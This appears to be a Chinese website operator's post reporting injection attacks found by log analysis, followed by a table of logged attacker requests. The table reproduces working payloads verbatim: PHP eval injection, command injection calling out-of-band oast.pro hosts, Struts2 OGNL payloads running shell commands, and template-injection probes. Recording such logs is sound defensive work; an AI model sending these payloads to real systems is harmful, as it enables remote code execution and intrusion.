今天通过日志分析系统发现,最近不少黑客对网站进行注入攻击。
<![if supportMisalignedColumns]> <![endif]>| 日期 | 时间 | I黑客P地址 | 注入参数 | 用户代理 |
| 2023/10/25 | 12:06:19 | 45.142.76.122 | s=/module/action/param1/${@print(eval($_POST[c]))} | Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.2) |
| 2023/11/13 | 23:41:42 | 141.98.255.144 | NodeCode=1050070011;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}&ID=1000000399484251;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 |
| 2023/11/13 | 23:41:42 | 141.98.255.144 | NodeCode=1050020021;nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 |
| 2023/11/13 | 23:41:42 | 141.98.255.144 | NodeCode=1050080021;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}&ID=1000009466152571;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 |
| 2023/11/13 | 23:41:42 | 141.98.255.144 | NodeCode=1050070011;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}&ID=1000000399484251;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0p1btye7u9bhen.oast.pro;#${IFS} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 |
| 2023/11/13 | 23:41:42 | 141.98.255.144 | NodeCode=1050020021;nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0sx5scemd1gspg.oast.pro;#${IFS} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 |
| 2023/11/13 | 23:41:42 | 141.98.255.144 | NodeCode=1050080021;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}&ID=1000009466152571;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0ac8je1qg71o4o.oast.pro;#${IFS} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 |
| 2023/11/13 | 23:30:04 | 141.98.255.144 | NodeCode=1050080021;nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}&ID=1000005622917961;nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0z6zsa555zjhi6.oast.pro;#${IFS} | Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 |
| 2023/11/13 | 23:30:04 | 141.98.255.144 | NodeCode=1050050011;nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}&ID=1000000771673841;nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0zkz48iqh8r9mq.oast.pro;#${IFS} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 |
| 2023/11/13 | 23:30:04 | 141.98.255.144 | NodeCode=1050060011;nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}&ID=401;nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}|;nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS}";nslookup${IFS}cl94p6ok8dg2mqcvhit0s46d1prcukzwr.oast.pro;#${IFS} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F |
| 2023/11/14 | 9:18:18 | 107.172.83.34 | search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 |
| 2023/11/14 | 9:47:29 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 |
| 2023/11/14 | 9:47:33 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/11/14 | 9:47:47 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/11/14 | 12:24:16 | 107.172.83.34 | id=F7IZsu%25{128*128} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 |
| 2023/11/14 | 16:28:52 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 |
| 2023/11/14 | 16:28:56 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/11/14 | 16:33:43 | 107.172.83.34 | _tn={{trimprefix(base64_decode(httoken), | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 |
| 2023/11/14 | 20:43:09 | 107.172.83.34 | mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/11/14 | 23:24:29 | 107.172.83.34 | url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0qunwxsc1x9mgj.oast.pro|)}&mgrDn=a&pwd=a | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 |
| 2023/11/14 | 9:47:57 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 |
| 2023/11/14 | 9:48:09 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 |
| 2023/11/14 | 9:48:15 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 |
| 2023/11/14 | 10:16:18 | 107.172.83.34 | response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 |
| 2023/11/14 | 12:24:16 | 107.172.83.34 | id=F7IZsu%25{128*128} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 |
| 2023/11/14 | 9:18:18 | 107.172.83.34 | search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 |
| 2023/11/14 | 9:47:29 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 |
| 2023/11/14 | 9:47:33 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/11/14 | 9:47:47 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/11/14 | 9:47:57 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 |
| 2023/11/14 | 9:48:09 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 |
| 2023/11/14 | 9:48:15 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 |
| 2023/11/14 | 10:16:18 | 107.172.83.34 | response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 |
| 2023/11/14 | 23:24:29 | 107.172.83.34 | url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0qunwxsc1x9mgj.oast.pro|)}&mgrDn=a&pwd=a | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 |
| 2023/11/14 | 16:28:52 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 |
| 2023/11/14 | 16:28:56 | 107.172.83.34 | uri={{228*|98|}} | Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/11/14 | 16:33:43 | 107.172.83.34 | _tn={{trimprefix(base64_decode(httoken), | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 |
| 2023/11/14 | 20:43:09 | 107.172.83.34 | mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/11/14 | 9:18:18 | 107.172.83.34 | search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.} | Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 |
| 2023/11/14 | 9:47:30 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 |
| 2023/11/14 | 9:47:38 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/11/14 | 9:47:50 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 |
| 2023/11/14 | 9:47:57 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/11/14 | 9:48:08 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 |
| 2023/11/14 | 9:48:15 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 |
| 2023/11/14 | 10:16:18 | 107.172.83.34 | response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 |
| 2023/11/14 | 20:43:08 | 107.172.83.34 | mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 |
| 2023/11/14 | 23:24:29 | 107.172.83.34 | url=%23{T(java.net.InetAddress).getByName(|cl9hkovpu5aci1q5grr0x36xyfapje9yw.oast.pro|)}&mgrDn=a&pwd=a | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F |
| 2023/11/14 | 9:18:18 | 107.172.83.34 | search==%00{.cookie|dF0yiY|value%3dCVE-2014-6287.} | Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/11/14 | 9:47:30 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 |
| 2023/11/14 | 9:47:39 | 107.172.83.34 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/11/14 | 9:47:54 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F |
| 2023/11/14 | 9:48:01 | 107.172.83.34 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 |
| 2023/11/14 | 9:48:12 | 107.172.83.34 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
